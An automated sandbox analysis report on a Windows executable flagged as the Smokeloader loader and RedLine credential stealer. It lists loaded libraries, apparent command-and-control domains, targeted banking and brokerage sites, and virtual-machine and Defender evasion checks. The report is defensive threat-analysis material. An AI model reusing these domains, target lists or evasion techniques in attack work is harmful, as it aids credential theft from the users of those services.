                      Source: C:\Users\user\Desktop\MPgkx6bQIQ.exe | Code function: 0_2_00431839 GetDC, GetSystemMetrics, GetSystemMetrics, GetSystemMetrics, GetCurrentObject, GetObjectW, DeleteObject, CreateCompatibleDC, CreateCompatibleBitmap, SelectObject, BitBlt | 0_2_00431839

                      System Summary

                      Source: 00000000.00000002.1693888263.0000000002480000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY | Matched rule: Windows_Trojan_Smokeloader_3687686f | Author: unknown
                      Source: 00000000.00000002.1693514918.00000000008E9000.00000040.00000020.00020000.00000000.sdmp, type: MEMORY | Matched rule: Windows_Trojan_RedLineStealer_ed346e4c | Author: unknown
                      Source: C:\Users\user\Desktop\MPgkx6bQIQ.exeCode function: String function: 024881D7 appears 78 times
                      Source: C:\Users\user\Desktop\MPgkx6bQIQ.exeCode function: String function: 00414060 appears 74 times
                      Source: C:\Users\user\Desktop\MPgkx6bQIQ.exeCode function: String function: 00407F70 appears 46 times
                      Source: C:\Users\user\Desktop\MPgkx6bQIQ.exeCode function: String function: 024942C7 appears 74 times
                      Source: C:\Users\user\Desktop\MPgkx6bQIQ.exeProcess created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 7680 -s 1760
                      Source: MPgkx6bQIQ.exeStatic PE information: RELOCS_STRIPPED, EXECUTABLE_IMAGE, 32BIT_MACHINE
                      Source: 00000000.00000002.1693888263.0000000002480000.00000040.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Smokeloader_3687686f reference_sample = 8b3014ecd962a335b246f6c70fc820247e8bdaef98136e464b1fdb824031eef7, os = windows, severity = x86, creation_date = 2021-07-21, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Smokeloader, fingerprint = 0f483f9f79ae29b944825c1987366d7b450312f475845e2242a07674580918bc, id = 3687686f-8fbf-4f09-9afa-612ee65dc86c, last_modified = 2021-08-23
                      Source: 00000000.00000002.1693514918.00000000008E9000.00000040.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_RedLineStealer_ed346e4c reference_sample = a91c1d3965f11509d1c1125210166b824a79650f29ea203983fffb5f8900858c, os = windows, severity = x86, creation_date = 2022-02-17, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.RedLineStealer, fingerprint = 834c13b2e0497787e552bb1318664496d286e7cf57b4661e5e07bf1cffe61b82, id = ed346e4c-7890-41ee-8648-f512682fe20e, last_modified = 2022-04-12
                      Source: MPgkx6bQIQ.exeStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                      Source: classification engineClassification label: mal100.troj.spyw.evad.winEXE@2/5@10/2
                      Source: C:\Users\user\Desktop\MPgkx6bQIQ.exeCode function: 0_2_008EA28E CreateToolhelp32Snapshot,Module32First,0_2_008EA28E
                      Source: C:\Users\user\Desktop\MPgkx6bQIQ.exeCode function: 0_2_004361E0 CoCreateInstance,SysAllocString,CoSetProxyBlanket,SysAllocString,SysAllocString,VariantInit,VariantClear,SysFreeString,SysFreeString,SysFreeString,SysFreeString,GetVolumeInformationW,0_2_004361E0
                      Source: C:\Windows\SysWOW64\WerFault.exeMutant created: \Sessions\1\BaseNamedObjects\Local\WERReportingForProcess7680
                      Source: C:\Windows\SysWOW64\WerFault.exeFile created: C:\ProgramData\Microsoft\Windows\WER\Temp\0bee489a-e8c0-4ab6-8733-c0cbf5a717d8Jump to behavior
                      Source: MPgkx6bQIQ.exeStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                      Source: C:\Users\user\Desktop\MPgkx6bQIQ.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
                      Source: MPgkx6bQIQ.exe, 00000000.00000003.1514818797.0000000003081000.00000004.00000800.00020000.00000000.sdmp, MPgkx6bQIQ.exe, 00000000.00000003.1515488077.0000000003065000.00000004.00000800.00020000.00000000.sdmp, MPgkx6bQIQ.exe, 00000000.00000003.1538531739.0000000003093000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: CREATE TABLE password_notes (id INTEGER PRIMARY KEY AUTOINCREMENT, parent_id INTEGER NOT NULL REFERENCES logins ON UPDATE CASCADE ON DELETE CASCADE DEFERRABLE INITIALLY DEFERRED, key VARCHAR NOT NULL, value BLOB, date_created INTEGER NOT NULL, confidential INTEGER, UNIQUE (parent_id, key));
                      Source: MPgkx6bQIQ.exeVirustotal: Detection: 41%
                      Source: MPgkx6bQIQ.exeReversingLabs: Detection: 55%
                      Source: C:\Users\user\Desktop\MPgkx6bQIQ.exeFile read: C:\Users\user\Desktop\MPgkx6bQIQ.exeJump to behavior
                      Source: unknownProcess created: C:\Users\user\Desktop\MPgkx6bQIQ.exe "C:\Users\user\Desktop\MPgkx6bQIQ.exe"
                      Source: C:\Users\user\Desktop\MPgkx6bQIQ.exeProcess created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 7680 -s 1760
                      Source: C:\Users\user\Desktop\MPgkx6bQIQ.exeSection loaded: apphelp.dllJump to behavior
                      Source: C:\Users\user\Desktop\MPgkx6bQIQ.exeSection loaded: msimg32.dllJump to behavior
                      Source: C:\Users\user\Desktop\MPgkx6bQIQ.exeSection loaded: msvcr100.dllJump to behavior
                      Source: C:\Users\user\Desktop\MPgkx6bQIQ.exeSection loaded: windows.storage.dllJump to behavior
                      Source: C:\Users\user\Desktop\MPgkx6bQIQ.exeSection loaded: wldp.dllJump to behavior
                      Source: C:\Users\user\Desktop\MPgkx6bQIQ.exeSection loaded: winhttp.dllJump to behavior
                      Source: C:\Users\user\Desktop\MPgkx6bQIQ.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
                      Source: C:\Users\user\Desktop\MPgkx6bQIQ.exeSection loaded: webio.dllJump to behavior
                      Source: C:\Users\user\Desktop\MPgkx6bQIQ.exeSection loaded: mswsock.dllJump to behavior
                      Source: C:\Users\user\Desktop\MPgkx6bQIQ.exeSection loaded: iphlpapi.dllJump to behavior
                      Source: C:\Users\user\Desktop\MPgkx6bQIQ.exeSection loaded: winnsi.dllJump to behavior
                      Source: C:\Users\user\Desktop\MPgkx6bQIQ.exeSection loaded: sspicli.dllJump to behavior
                      Source: C:\Users\user\Desktop\MPgkx6bQIQ.exeSection loaded: dnsapi.dllJump to behavior
                      Source: C:\Users\user\Desktop\MPgkx6bQIQ.exeSection loaded: rasadhlp.dllJump to behavior
                      Source: C:\Users\user\Desktop\MPgkx6bQIQ.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
                      Source: C:\Users\user\Desktop\MPgkx6bQIQ.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
                      Source: C:\Users\user\Desktop\MPgkx6bQIQ.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
                      Source: C:\Users\user\Desktop\MPgkx6bQIQ.exeSection loaded: fwpuclnt.dllJump to behavior
                      Source: C:\Users\user\Desktop\MPgkx6bQIQ.exeSection loaded: schannel.dllJump to behavior
                      Source: C:\Users\user\Desktop\MPgkx6bQIQ.exeSection loaded: mskeyprotect.dllJump to behavior
                      Source: C:\Users\user\Desktop\MPgkx6bQIQ.exeSection loaded: ntasn1.dllJump to behavior
                      Source: C:\Users\user\Desktop\MPgkx6bQIQ.exeSection loaded: ncrypt.dllJump to behavior
                      Source: C:\Users\user\Desktop\MPgkx6bQIQ.exeSection loaded: ncryptsslp.dllJump to behavior
                      Source: C:\Users\user\Desktop\MPgkx6bQIQ.exeSection loaded: msasn1.dllJump to behavior
                      Source: C:\Users\user\Desktop\MPgkx6bQIQ.exeSection loaded: cryptsp.dllJump to behavior
                      Source: C:\Users\user\Desktop\MPgkx6bQIQ.exeSection loaded: rsaenh.dllJump to behavior
                      Source: C:\Users\user\Desktop\MPgkx6bQIQ.exeSection loaded: cryptbase.dllJump to behavior
                      Source: C:\Users\user\Desktop\MPgkx6bQIQ.exeSection loaded: gpapi.dllJump to behavior
                      Source: C:\Users\user\Desktop\MPgkx6bQIQ.exeSection loaded: dpapi.dllJump to behavior
                      Source: C:\Users\user\Desktop\MPgkx6bQIQ.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
                      Source: C:\Users\user\Desktop\MPgkx6bQIQ.exeSection loaded: kernel.appcore.dllJump to behavior
                      Source: C:\Users\user\Desktop\MPgkx6bQIQ.exeSection loaded: uxtheme.dllJump to behavior
                      Source: C:\Users\user\Desktop\MPgkx6bQIQ.exeSection loaded: wbemcomn.dllJump to behavior
                      Source: C:\Users\user\Desktop\MPgkx6bQIQ.exeSection loaded: amsi.dllJump to behavior
                      Source: C:\Users\user\Desktop\MPgkx6bQIQ.exeSection loaded: userenv.dllJump to behavior
                      Source: C:\Users\user\Desktop\MPgkx6bQIQ.exeSection loaded: profapi.dllJump to behavior
                      Source: C:\Users\user\Desktop\MPgkx6bQIQ.exeSection loaded: version.dllJump to behavior
                      Source: C:\Users\user\Desktop\MPgkx6bQIQ.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
                      Source: C:\Users\user\Desktop\MPgkx6bQIQ.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
                      Source: C:\Users\user\Desktop\MPgkx6bQIQ.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
                      Source: C:\Users\user\Desktop\MPgkx6bQIQ.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
                      Source: C:\Users\user\Desktop\MPgkx6bQIQ.exeFile opened: C:\Windows\SysWOW64\msvcr100.dllJump to behavior

                      Data Obfuscation

                      Source: C:\Users\user\Desktop\MPgkx6bQIQ.exe | Unpacked PE file: 0.2.MPgkx6bQIQ.exe.400000.0.unpack .text:ER;.rdata:R;.data:W;.rsrc:R; vs .text:ER;.rdata:R;.data:W;.CRT:R;.reloc:R;
                      Source: C:\Users\user\Desktop\MPgkx6bQIQ.exe | Unpacked PE file: 0.2.MPgkx6bQIQ.exe.400000.0.unpack
                      Source: C:\Users\user\Desktop\MPgkx6bQIQ.exe | Code function: 0_2_0043F83E push es; retf 0_2_0043F83F
                      Source: C:\Users\user\Desktop\MPgkx6bQIQ.exe | Code function: 0_2_0041ACF6 push esp; iretd 0_2_0041ACFF
                      Source: C:\Users\user\Desktop\MPgkx6bQIQ.exe | Code function: 0_2_00444520 push ebp; ret 0_2_00444522
                      Source: C:\Users\user\Desktop\MPgkx6bQIQ.exe | Code function: 0_2_0043BF00 push eax; mov dword ptr [esp], 49484716h 0_2_0043BF01
                      Source: C:\Users\user\Desktop\MPgkx6bQIQ.exe | Code function: 0_2_008ECCDD pushad ; ret 0_2_008ECCE2
                      Source: C:\Users\user\Desktop\MPgkx6bQIQ.exe | Code function: 0_2_008ECF63 push ebp; ret 0_2_008ECF68
                      Source: C:\Users\user\Desktop\MPgkx6bQIQ.exe | Code function: 0_2_024BC167 push eax; mov dword ptr [esp], 49484716h 0_2_024BC168
                      Source: C:\Users\user\Desktop\MPgkx6bQIQ.exe | Code function: 0_2_024BF6A5 push es; retf 0_2_024BF6A6
                      Source: C:\Users\user\Desktop\MPgkx6bQIQ.exe | Code function: 0_2_0249AF5D push esp; iretd 0_2_0249AF66
                      Source: MPgkx6bQIQ.exe | Static PE information: section name: .text entropy: 7.370191608980691
                      Source: C:\Users\user\Desktop\MPgkx6bQIQ.exe | Process information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WerFault.exe | Process information set: FAILCRITICALERRORS | NOGPFAULTERRORBOX
                      Source: C:\Windows\SysWOW64\WerFault.exe | Process information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WerFault.exe | Process information set: FAILCRITICALERRORS | NOGPFAULTERRORBOX
                      Source: C:\Windows\SysWOW64\WerFault.exe | Process information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WerFault.exe | Process information set: FAILCRITICALERRORS | NOGPFAULTERRORBOX
                      Source: C:\Windows\SysWOW64\WerFault.exe | Process information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WerFault.exe | Process information set: FAILCRITICALERRORS | NOGPFAULTERRORBOX
                      Source: C:\Windows\SysWOW64\WerFault.exe | Process information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WerFault.exe | Process information set: FAILCRITICALERRORS | NOGPFAULTERRORBOX
                      Source: C:\Windows\SysWOW64\WerFault.exe | Process information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WerFault.exe | Process information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WerFault.exe | Process information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WerFault.exe | Process information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WerFault.exe | Process information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WerFault.exe | Process information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WerFault.exe | Process information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WerFault.exe | Process information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WerFault.exe | Process information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WerFault.exe | Process information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WerFault.exe | Process information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WerFault.exe | Process information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WerFault.exe | Process information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WerFault.exe | Process information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WerFault.exe | Process information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WerFault.exe | Process information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WerFault.exe | Process information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WerFault.exe | Process information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WerFault.exe | Process information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WerFault.exe | Process information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WerFault.exe | Process information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WerFault.exe | Process information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WerFault.exe | Process information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WerFault.exe | Process information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WerFault.exe | Process information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WerFault.exe | Process information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WerFault.exe | Process information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WerFault.exe | Process information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WerFault.exe | Process information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WerFault.exe | Process information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WerFault.exe | Process information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WerFault.exe | Process information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WerFault.exe | Process information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WerFault.exe | Process information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WerFault.exe | Process information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WerFault.exe | Process information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WerFault.exe | Process information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WerFault.exe | Process information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WerFault.exe | Process information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WerFault.exe | Process information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WerFault.exe | Process information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WerFault.exe | Process information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WerFault.exe | Process information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WerFault.exe | Process information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WerFault.exe | Process information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WerFault.exe | Process information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WerFault.exe | Process information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WerFault.exe | Process information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WerFault.exe | Process information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WerFault.exe | Process information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\Desktop\MPgkx6bQIQ.exe TID: 7772 | Thread sleep time: -180000s >= -30000s
                      Source: C:\Users\user\Desktop\MPgkx6bQIQ.exe | WMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT * FROM Win32_BIOS
                      Source: MPgkx6bQIQ.exe, 00000000.00000003.1537977940.00000000030B9000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: - GDCDYNVMware20,11696494690p
                      Source: Amcache.hve.5.dr | Binary or memory string: VMware
                      Source: MPgkx6bQIQ.exe, 00000000.00000003.1537977940.00000000030B4000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: ms.portal.azure.comVMware20,11696494690
                      Source: MPgkx6bQIQ.exe, 00000000.00000003.1537977940.00000000030B4000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: AMC password management pageVMware20,11696494690
                      Source: MPgkx6bQIQ.exe, 00000000.00000003.1537977940.00000000030B4000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: Interactive Brokers - GDCDYNVMware20,11696494690p
                      Source: MPgkx6bQIQ.exe, 00000000.00000003.1537977940.00000000030B4000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: netportal.hdfcbank.comVMware20,11696494690
                      Source: MPgkx6bQIQ.exe, 00000000.00000003.1537977940.00000000030B4000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: interactivebrokers.comVMware20,11696494690
                      Source: MPgkx6bQIQ.exe, 00000000.00000003.1537977940.00000000030B4000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: interactivebrokers.co.inVMware20,11696494690d
                      Source: Amcache.hve.5.dr | Binary or memory string: Ascsi/cdrom&ven_necvmwar&prod_vmware_sata_cd00/4&224f42ef&0&000000
                      Source: MPgkx6bQIQ.exe, 00000000.00000003.1537977940.00000000030B4000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: account.microsoft.com/profileVMware20,11696494690u
                      Source: MPgkx6bQIQ.exe, 00000000.00000002.1693563145.0000000000968000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: Hyper-V RAW
                      Source: Amcache.hve.5.dr | Binary or memory string: pci\ven_15ad&dev_0740&subsys_074015ad,pci\ven_15ad&dev_0740,root\vmwvmcihostdev
                      Source: MPgkx6bQIQ.exe, 00000000.00000003.1537977940.00000000030B4000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: tasks.office.comVMware20,11696494690o
                      Source: Amcache.hve.5.dr | Binary or memory string: vmci.sys
                      Source: MPgkx6bQIQ.exe, 00000000.00000003.1537977940.00000000030B4000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: www.interactivebrokers.co.inVMware20,11696494690~
                      Source: MPgkx6bQIQ.exe, 00000000.00000003.1537977940.00000000030B4000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: Interactive Brokers - COM.HKVMware20,11696494690
                      Source: MPgkx6bQIQ.exe, 00000000.00000003.1537977940.00000000030B4000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: global block list test formVMware20,11696494690
                      Source: Amcache.hve.5.dr | Binary or memory string: VMware20,1
                      Source: Amcache.hve.5.dr | Binary or memory string: Microsoft Hyper-V Generation Counter
                      Source: Amcache.hve.5.dr | Binary or memory string: NECVMWar VMware SATA CD00
                      Source: Amcache.hve.5.dr | Binary or memory string: VMware Virtual disk SCSI Disk Device
                      Source: Amcache.hve.5.dr | Binary or memory string: scsi\diskvmware__virtual_disk____2.0_,scsi\diskvmware__virtual_disk____,scsi\diskvmware__,scsi\vmware__virtual_disk____2,vmware__virtual_disk____2,gendisk
                      Source: MPgkx6bQIQ.exe, 00000000.00000003.1537977940.00000000030B4000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: turbotax.intuit.comVMware20,11696494690t
                      Source: Amcache.hve.5.dr | Binary or memory string: Microsoft Hyper-V Virtualization Infrastructure Driver
                      Source: Amcache.hve.5.dr | Binary or memory string: VMware PCI VMCI Bus Device
                      Source: Amcache.hve.5.dr | Binary or memory string: VMware VMCI Bus Device
                      Source: MPgkx6bQIQ.exe, 00000000.00000003.1537977940.00000000030B4000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: bankofamerica.comVMware20,11696494690x
                      Source: MPgkx6bQIQ.exe, 00000000.00000003.1537977940.00000000030B4000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: Canara Transaction PasswordVMware20,11696494690}
                      Source: Amcache.hve.5.dr | Binary or memory string: VMware Virtual RAM
                      Source: Amcache.hve.5.dr | Binary or memory string: BiosVendor:VMware, Inc.,BiosVersion:VMW201.00V.20829224.B64.2211211842,BiosReleaseDate:11/21/2022,BiosMajorRelease:0xff,BiosMinorRelease:0xff,SystemManufacturer:VMware, Inc.,SystemProduct:VMware20,1,SystemFamily:,SystemSKUNumber:,BaseboardManufacturer:,BaseboardProduct:,BaseboardVersion:,EnclosureType:0x1
                      Source: MPgkx6bQIQ.exe, 00000000.00000003.1537977940.00000000030B4000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: Canara Change Transaction PasswordVMware20,11696494690
                      Source: MPgkx6bQIQ.exe, 00000000.00000003.1537977940.00000000030B4000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: Interactive Brokers - HKVMware20,11696494690]
                      Source: MPgkx6bQIQ.exe, 00000000.00000003.1537977940.00000000030B4000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: Canara Transaction PasswordVMware20,11696494690x
                      Source: MPgkx6bQIQ.exe, 00000000.00000003.1537977940.00000000030B4000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: Interactive Brokers - EU East & CentralVMware20,11696494690
                      Source: MPgkx6bQIQ.exe, 00000000.00000003.1537977940.00000000030B4000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: secure.bankofamerica.comVMware20,11696494690|UE
                      Source: Amcache.hve.5.dr | Binary or memory string: vmci.inf_amd64_68ed49469341f563
                      Source: MPgkx6bQIQ.exe, 00000000.00000003.1537977940.00000000030B4000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: discord.comVMware20,11696494690f
                      Source: Amcache.hve.5.dr | Binary or memory string: VMware Virtual USB Mouse
                      Source: MPgkx6bQIQ.exe, 00000000.00000003.1537977940.00000000030B4000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: outlook.office.comVMware20,11696494690s
                      Source: Amcache.hve.5.dr | Binary or memory string: vmci.syshbin
                      Source: Amcache.hve.5.dr | Binary or memory string: VMware, Inc.
                      Source: Amcache.hve.5.dr | Binary or memory string: VMware-42 27 c5 9a 47 85 d6 84-53 49 ec ec 87 a6 6d 67
                      Source: MPgkx6bQIQ.exe, 00000000.00000003.1537977940.00000000030B4000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: Interactive Brokers - non-EU EuropeVMware20,11696494690
                      Source: MPgkx6bQIQ.exe, 00000000.00000003.1537977940.00000000030B4000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: Interactive Brokers - EU WestVMware20,11696494690n
                      Source: MPgkx6bQIQ.exe, 00000000.00000002.1693563145.0000000000925000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: Hyper-V RAW0
                      Source: Amcache.hve.5.dr | Binary or memory string: VMware20,1hbin@
                      Source: Amcache.hve.5.dr | Binary or memory string: c:\windows\system32\driverstore\filerepository\vmci.inf_amd64_68ed49469341f563
                      Source: Amcache.hve.5.dr | Binary or memory string: .Z$c:/windows/system32/drivers/vmci.sys
                      Source: MPgkx6bQIQ.exe, 00000000.00000003.1537977940.00000000030B4000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: outlook.office365.comVMware20,11696494690t
                      Source: Amcache.hve.5.dr | Binary or memory string: :scsi/disk&ven_vmware&prod_virtual_disk/4&1656f219&0&000000
                      Source: MPgkx6bQIQ.exe, 00000000.00000003.1537977940.00000000030B4000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: www.interactivebrokers.comVMware20,11696494690}
                      Source: MPgkx6bQIQ.exe, 00000000.00000003.1537977940.00000000030B4000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: microsoft.visualstudio.comVMware20,11696494690x
                      Source: MPgkx6bQIQ.exe, 00000000.00000003.1537977940.00000000030B4000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: Canara Change Transaction PasswordVMware20,11696494690^
                      Source: Amcache.hve.5.dr | Binary or memory string: c:/windows/system32/drivers/vmci.sys
                      Source: MPgkx6bQIQ.exe, 00000000.00000003.1537977940.00000000030B4000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: Test URL for global passwords blocklistVMware20,11696494690
                      Source: Amcache.hve.5.dr | Binary or memory string: scsi/cdrom&ven_necvmwar&prod_vmware_sata_cd00/4&224f42ef&0&000000
                      Source: MPgkx6bQIQ.exe, 00000000.00000003.1537977940.00000000030B4000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: Interactive Brokers - NDCDYNVMware20,11696494690z
                      Source: MPgkx6bQIQ.exe, 00000000.00000003.1537977940.00000000030B4000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: trackpan.utiitsl.comVMware20,11696494690h
                      Source: Amcache.hve.5.dr | Binary or memory string: vmci.syshbin`
                      Source: Amcache.hve.5.dr | Binary or memory string: \driver\vmci,\driver\pci
                      Source: MPgkx6bQIQ.exe, 00000000.00000003.1537977940.00000000030B4000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: dev.azure.comVMware20,11696494690j
                      Source: Amcache.hve.5.dr | Binary or memory string: scsi/disk&ven_vmware&prod_virtual_disk/4&1656f219&0&000000
                      Source: Amcache.hve.5.dr | Binary or memory string: scsi\cdromnecvmwarvmware_sata_cd001.00,scsi\cdromnecvmwarvmware_sata_cd00,scsi\cdromnecvmwar,scsi\necvmwarvmware_sata_cd001,necvmwarvmware_sata_cd001,gencdrom
                      Source: C:\Users\user\Desktop\MPgkx6bQIQ.exe | API call chain: ExitProcess graph end node graph_0-26334
                      Source: C:\Users\user\Desktop\MPgkx6bQIQ.exe | Code function: 0_2_0043A9B0 LdrInitializeThunk
                      Source: C:\Users\user\Desktop\MPgkx6bQIQ.exe | Code function: 0_2_008E9B6B push dword ptr fs:[00000030h]
                      Source: C:\Users\user\Desktop\MPgkx6bQIQ.exe | Code function: 0_2_0248092B mov eax, dword ptr fs:[00000030h]
                      Source: C:\Users\user\Desktop\MPgkx6bQIQ.exe | Code function: 0_2_02480D90 mov eax, dword ptr fs:[00000030h]

                      HIPS / PFW / Operating System Protection Evasion

                      Source: MPgkx6bQIQ.exe | String found in binary or memory: hummskitnj.buzz
                      Source: MPgkx6bQIQ.exe | String found in binary or memory: cashfuzysao.buzz
                      Source: MPgkx6bQIQ.exe | String found in binary or memory: appliacnesot.buzz
                      Source: MPgkx6bQIQ.exe | String found in binary or memory: screwamusresz.buzz
                      Source: MPgkx6bQIQ.exe | String found in binary or memory: inherineau.buzz
                      Source: MPgkx6bQIQ.exe | String found in binary or memory: scentniej.buzz
                      Source: MPgkx6bQIQ.exe | String found in binary or memory: rebuildeso.buzz
                      Source: MPgkx6bQIQ.exe | String found in binary or memory: prisonyfork.buzz
                      Source: C:\Users\user\Desktop\MPgkx6bQIQ.exe | Queries volume information: C:\ VolumeInformation
                      Source: C:\Users\user\Desktop\MPgkx6bQIQ.exe | Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid
                      Source: Amcache.hve.5.dr | Binary or memory string: c:\programdata\microsoft\windows defender\platform\4.18.23080.2006-0\msmpeng.exe
                      Source: Amcache.hve.5.dr | Binary or memory string: msmpeng.exe
                      Source: Amcache.hve.5.dr | Binary or memory string: c:\program files\windows defender\msmpeng.exe
                      Source: Amcache.hve.5.dr | Binary or memory string: c:\programdata\microsoft\windows defender\platform\4.18.23090.2008-0\msmpeng.exe
                      Source: Amcache.hve.5.dr | Binary or memory string: MsMpEng.exe

                      Stealing of Sensitive Information

Source: Yara match | File source: 0.3.MPgkx6bQIQ.exe.24d0000.0.unpack, type: UNPACKEDPE
Source: Yara match | File source: 0.2.MPgkx6bQIQ.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 0.2.MPgkx6bQIQ.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match | File source: 0.3.MPgkx6bQIQ.exe.24d0000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 00000000.00000002.1693888263.0000000002480000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000000.00000002.1693216744.0000000000400000.00000040.00000001.01000000.00000003.sdmp, type: MEMORY
